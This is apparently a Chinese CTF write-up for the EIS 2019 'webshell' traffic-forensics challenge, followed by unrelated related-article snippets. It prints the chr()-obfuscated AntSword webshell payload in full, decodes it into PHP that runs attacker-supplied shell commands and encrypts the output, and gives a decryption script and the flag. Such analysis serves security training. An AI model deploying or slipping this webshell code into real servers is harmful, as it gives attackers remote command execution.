EIS 2019 webshell

请求中可以确定是http POST流量
image.png
image.png
同时可以判断是 蚁剑的流量
image.png
进一步过滤 http.request.method =="POST"
image.png
直接追踪其tcp流
image.png

  • 得到 列举部分
@eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28)

直接输出一下 内容

<?php
echo(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).ChR(0x72).ChR(0x73).ChR(0x22).ChR(0x2c).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x74).ChR(0x69).ChR(0x6d).ChR(0x65).ChR(0x5f).ChR(0x6c).ChR(0x69).ChR(0x6d).ChR(0x69).ChR(0x74).ChR(0x28).ChR(0x30).ChR(0x29).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x6b).ChR(0x65).ChR(0x79).ChR(0x3d).ChR(0x27).ChR(0x66).ChR(0x35).ChR(0x30).ChR(0x34).ChR(0x35).ChR(0x62).ChR(0x30).ChR(0x35).ChR(0x61).ChR(0x62).ChR(0x65).ChR(0x36).ChR(0x65).ChR(0x63).ChR(0x39).ChR(0x62).ChR(0x31).ChR(0x65).ChR(0x33).ChR(0x37).ChR(0x66).ChR(0x61).ChR(0x66).ChR(0x61).ChR(0x38).ChR(0x35).ChR(0x31).ChR(0x66).ChR(0x35).ChR(0x64).ChR(0x65).ChR(0x39).ChR(0x27).ChR(0x3b).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x40).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x73).ChR(0x73).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x72).ChR(0x79).ChR(0x70).ChR(0x74).ChR(0x28).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x2c).ChR(0x20).ChR(0x27).ChR(0x41).ChR(0x45).ChR(0x53).ChR(0x2d).ChR(0x31).ChR(0x32).ChR(0x38).ChR(0x2d).ChR(0x45).ChR(0x43).ChR(0x42).ChR(0x27).ChR(0x2c).ChR(0x20).ChR(0x24).ChR(0x6b).ChR(0x65).ChR(0x79).ChR(0x2c).ChR(0x20).ChR(0x4f).ChR(0x50).ChR(0x45).ChR(0x4e).ChR(0x53).ChR(0x53).ChR(0x4c).ChR(0x5f).ChR(0x52).ChR(0x41).ChR(0x57).ChR(0x5f).ChR(0x44).ChR(0x41).ChR(0x54).ChR(0x41).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x3d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x63).ChR(0x6f).ChR(0x6e).ChR(0x74).ChR(0x65).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x64).ChR(0x5f).ChR(0x63).ChR(0x6c).ChR(0x65).ChR(0x61).ChR(0x6e).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x38).ChR(0x39).ChR(0x37).ChR(0x64).ChR(0x22).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x40).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x36).ChR(0x30).ChR(0x63).ChR(0x39).ChR(0x37).ChR(0x22).ChR(0x3b).ChR(0x7d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x74).ChR(0x72).ChR(0x79).ChR(0x7b).ChR(0x24).ChR(0x70).ChR(0x3d).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x64).ChR(0x65).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x50).ChR(0x4f).ChR(0x53).ChR(0x54).ChR(0x5b).ChR(0x22).ChR(0x30).ChR(0x78).ChR(0x63).ChR(0x34).ChR(0x36).ChR(0x31).ChR(0x65).ChR(0x38).ChR(0x36).ChR(0x31).ChR(0x39).ChR(0x36).ChR(0x66).ChR(0x31).ChR(0x61).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x73).ChR(0x3d).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x64).ChR(0x65).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x50).ChR(0x4f).ChR(0x53).ChR(0x54).ChR(0x5b).ChR(0x22).ChR(0x30).ChR(0x78).ChR(0x39).ChR(0x65).ChR(0x63).ChR(0x33).ChR(0x66).ChR(0x61).ChR(0x39).ChR(0x38).ChR(0x61).ChR(0x32).ChR(0x38).ChR(0x33).ChR(0x66).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x53).ChR(0x45).ChR(0x52).ChR(0x56).ChR(0x45).ChR(0x52).ChR(0x5b).ChR(0x22).ChR(0x53).ChR(0x43).ChR(0x52).ChR(0x49).ChR(0x50).ChR(0x54).ChR(0x5f).ChR(0x46).ChR(0x49).ChR(0x4c).ChR(0x45).ChR(0x4e).ChR(0x41).ChR(0x4d).ChR(0x45).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x63).ChR(0x3d).ChR(0x73).ChR(0x75).ChR(0x62).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x28).ChR(0x24).ChR(0x64).ChR(0x2c).ChR(0x30).ChR(0x2c).ChR(0x31).ChR(0x29).ChR(0x3d).ChR(0x3d).ChR(0x22).ChR(0x2f).ChR(0x22).ChR(0x3f).ChR(0x22).ChR(0x2d).ChR(0x63).ChR(0x20).ChR(0x5c).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x5c).ChR(0x22).ChR(0x22).ChR(0x3a).ChR(0x22).ChR(0x2f).ChR(0x63).ChR(0x20).ChR(0x5c).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x5c).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x24).ChR(0x72).ChR(0x3d).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x70).ChR(0x7d).ChR(0x20).ChR(0x7b).ChR(0x24).ChR(0x63).ChR(0x7d).ChR(0x22).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x65).ChR(0x78).ChR(0x70).ChR(0x6c).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x22).ChR(0x2c).ChR(0x22).ChR(0x2c).ChR(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x61).ChR(0x62).ChR(0x6c).ChR(0x65).ChR(0x5f).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x73).ChR(0x22).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x65).ChR(0x6d).ChR(0x70).ChR(0x74).ChR(0x79).ChR(0x28).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x6d).ChR(0x61).ChR(0x70).ChR(0x28).ChR(0x27).ChR(0x74).ChR(0x72).ChR(0x69).ChR(0x6d).ChR(0x27).ChR(0x2c).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x6d).ChR(0x61).ChR(0x70).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x74).ChR(0x6f).ChR(0x6c).ChR(0x6f).ChR(0x77).ChR(0x65).ChR(0x72).ChR(0x27).ChR(0x2c).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x28).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x69).ChR(0x73).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x26).ChR(0x26).ChR(0x69).ChR(0x73).ChR(0x5f).ChR(0x63).ChR(0x61).ChR(0x6c).ChR(0x6c).ChR(0x61).ChR(0x62).ChR(0x6c).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x26).ChR(0x26).ChR(0x21).ChR(0x69).ChR(0x6e).ChR(0x5f).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x2c).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x72).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x6d).ChR(0x64).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x30).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x70).ChR(0x61).ChR(0x73).ChR(0x73).ChR(0x74).ChR(0x68).ChR(0x72).ChR(0x75).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x70).ChR(0x61).ChR(0x73).ChR(0x73).ChR(0x74).ChR(0x68).ChR(0x72).ChR(0x75).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x68).ChR(0x65).ChR(0x6c).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x40).ChR(0x73).ChR(0x68).ChR(0x65).ChR(0x6c).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x6f).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x6a).ChR(0x6f).ChR(0x69).ChR(0x6e).ChR(0x28).ChR(0x22).ChR(0xa).ChR(0x22).ChR(0x2c).ChR(0x24).ChR(0x6f).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x70).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x3d).ChR(0x40).ChR(0x70).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x27).ChR(0x72).ChR(0x27).ChR(0x29).ChR(0x3b).ChR(0x77).ChR(0x68).ChR(0x69).ChR(0x6c).ChR(0x65).ChR(0x28).ChR(0x21).ChR(0x40).ChR(0x66).ChR(0x65).ChR(0x6f).ChR(0x66).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x40).ChR(0x66).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x2c).ChR(0x20).ChR(0x32).ChR(0x30).ChR(0x34).ChR(0x38).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x40).ChR(0x70).ChR(0x63).ChR(0x6c).ChR(0x6f).ChR(0x73).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x61).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x61).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x20).ChR(0x3d).ChR(0x20).ChR(0x31).ChR(0x32).ChR(0x37).ChR(0x3b).ChR(0x7d).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x40).ChR(0x72).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x6d).ChR(0x64).ChR(0x28).ChR(0x24).ChR(0x72).ChR(0x2e).ChR(0x22).ChR(0x20).ChR(0x32).ChR(0x3e).ChR(0x26).ChR(0x31).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x20).ChR(0x28).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x21).ChR(0x3d).ChR(0x30).ChR(0x29).ChR(0x3f).ChR(0x22).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x7d).ChR(0x22).ChR(0x3a).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x3b).ChR(0x7d).ChR(0x63).ChR(0x61).ChR(0x74).ChR(0x63).ChR(0x68).ChR(0x28).ChR(0x45).ChR(0x78).ChR(0x63).ChR(0x65).ChR(0x70).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x65).ChR(0x29).ChR(0x7b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x45).ChR(0x52).ChR(0x52).ChR(0x4f).ChR(0x52).ChR(0x3a).ChR(0x2f).ChR(0x2f).ChR(0x22).ChR(0x2e).ChR(0x24).ChR(0x65).ChR(0x2d).ChR(0x3e).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x4d).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x61).ChR(0x67).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x64).ChR(0x69).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b));
?>

image.png
php代码美化后

<?php
echo "Hello World !";
?>@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {@session_start();$key='f5045b05abe6ec9b1e37fafa851f5de9';return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {$output=ob_get_contents();ob_end_clean();echo "0897d";echo @asenc($output);echo "60c97";
}
ob_start();
try {$p=base64_decode($_POST["0xc461e86196f1a"]);$s=base64_decode($_POST["0x9ec3fa98a283f"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";function fe($f) {$d=explode(",",@ini_get("disable_functions"));if(empty($d)) {$d=array();} else {$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runcmd($c) {$ret=0;if(fe('system')) {@system($c,$ret);} elseif(fe('passthru')) {@passthru($c,$ret);} elseif(fe('shell_exec')) {print(@shell_exec($c));} elseif(fe('exec')) {@exec($c,$o,$ret);print(join("
",$o));} elseif(fe('popen')) {$fp=@popen($c,'r');while(!@feof($fp)) {print(@fgets($fp, 2048));}@pclose($fp);} elseif(fe('antsystem')) {@antsystem($c);} else {$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;
}
catch(Exception $e) {echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

已知加密的逻辑

function asenc($out) {@session_start();$key='f5045b05abe6ec9b1e37fafa851f5de9';return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {$output=ob_get_contents();ob_end_clean();echo "0897d";echo @asenc($output);echo "60c97";
}

对加密逻辑相反对应的解密脚本

<?php$cipher = "";function decrypt($cipher) {$key = 'f5045b05abe6ec9b1e37fafa851f5de9';return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);

对每个tcp流响应尝试解密 最后发现第7个响应数据包

8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnf

<?php$cipher = "8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5e2e10";function decrypt($cipher) {$key = 'f5045b05abe6ec9b1e37fafa851f5de9';return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);

image.png
base64解码后就是flag
image.png
flag{AntSword_is_Powerful_3222222!!!}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/22077.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

DeepMind:从LLMs到VLMs,不用看图就能理解图?

DeepMind:从LLMs到VLMs,不用看图就能理解图?

论文标题&#xff1a; FlexCap: Generating Rich, Localized, and Flexible Captions in Images 论文作者&#xff1a; Debidatta Dwibedi, Vidhi Jain, Jonathan Tompson, Andrew Zisserman, and Yusuf Aytar 参与机构&#xff1a; Google DeepMind, Carnegie Mellon Uni…
阅读更多...
Quantlab 4.1:基于Deap遗传算法多股票因子挖掘

Quantlab 4.1:基于Deap遗传算法多股票因子挖掘

原创文章第549篇&#xff0c;专注“AI量化投资、世界运行的规律、个人成长与财富自由"。 遗传算法本身并不复杂&#xff0c;但gplearn的实现&#xff0c;把问题复杂化了&#xff0c;尤其在因子挖掘这个场景。 使用deap进行因子挖掘的代码在如下位置&#xff1a; import …
阅读更多...
Nexus3(nexus-3.19.1-01)忘记管理员密码

Nexus3(nexus-3.19.1-01)忘记管理员密码

1、停服 ./nexus stop 2、进入OrientDB控制台&#xff1a; cd /apply/nexus3/nexus-3.42.0-01/lib/support/ java -jar ./nexus-orient-console.jar 3、在控制台执行&#xff1a; connect plocal:/apply/nexus3/sonatype-work/nexus3/db/security admin admin 4、重置密码…
阅读更多...
Redis之常用实战场景

Redis之常用实战场景

1.Redis数据丢失场景 1.1 持久化丢失 采用RDB或者不持久化&#xff0c;就会有数据丢失&#xff0c;因为是手动或者配置以快照的形式来进行备份。 解决: 启用AOF&#xff0c;以命令追加的形式进行备份&#xff0c;但是默认也会有1s丢失&#xff0c;这是在性能与数据安全性中寻…
阅读更多...
深入解析Spring Cloud Config:构建高可用分布式配置中心

深入解析Spring Cloud Config:构建高可用分布式配置中心

在微服务架构中&#xff0c;配置管理是一个关键问题。Spring Cloud Config提供了一种解决方案&#xff0c;它是一个高可用、分布式的外部配置中心。本文将深入探讨Spring Cloud Config的原理、架构及其在实际项目中的应用&#xff0c;帮助读者掌握如何构建一个高效、可靠的分布…
阅读更多...
SD NAND(贴片式TF卡)在储能领域的应用

SD NAND(贴片式TF卡)在储能领域的应用

储能系统&#xff08;Energy Storage System&#xff0c;简称ESS&#xff09;是指能将电能以化学能、势能、动能等形式储存起来&#xff0c;并在需要时将其转化为电能供应给用户的设备。主要由电池管理系统&#xff08;BMS&#xff09;、能量管理系统&#xff08;EMS&#xff0…
阅读更多...
拿到Offer了才知道,这家公司年终奖只有几百块~

拿到Offer了才知道,这家公司年终奖只有几百块~

我也挠头了 最近又有不少粉丝上岸了&#xff0c;其中一位分享的事情比较有意思&#xff0c;和你分享一下&#xff1a; 以后你对比Offer的时候也可以多个经验。 事情是这样的&#xff1a; 他在经过2个多月空窗期之后终于拿到了Offer&#xff0c;月薪涨幅不大&#xff0c;但是…
阅读更多...
java的clone

java的clone

一、clone的用法&#xff1a; package chatRoom.F5;class Person implements Cloneable{//1.public String name;public Person(String name) {this.name name;}//2.protected Person clone() throws CloneNotSupportedException {return (Person)super.clone();//重写Object…
阅读更多...
媒体有入口,发稿有入口 是什么意思?

媒体有入口,发稿有入口 是什么意思?

传媒如春雨&#xff0c;润物细无声&#xff0c;大家好&#xff0c;我是51媒体网胡老师。 媒体有入口&#xff0c;发稿有入口是指在新闻媒体发稿时&#xff0c;稿件可以通过一定的路径被访问和浏览。具体来说&#xff0c;有入口的新闻稿件可以通过点击链接&#xff0c;逐步深入…
阅读更多...
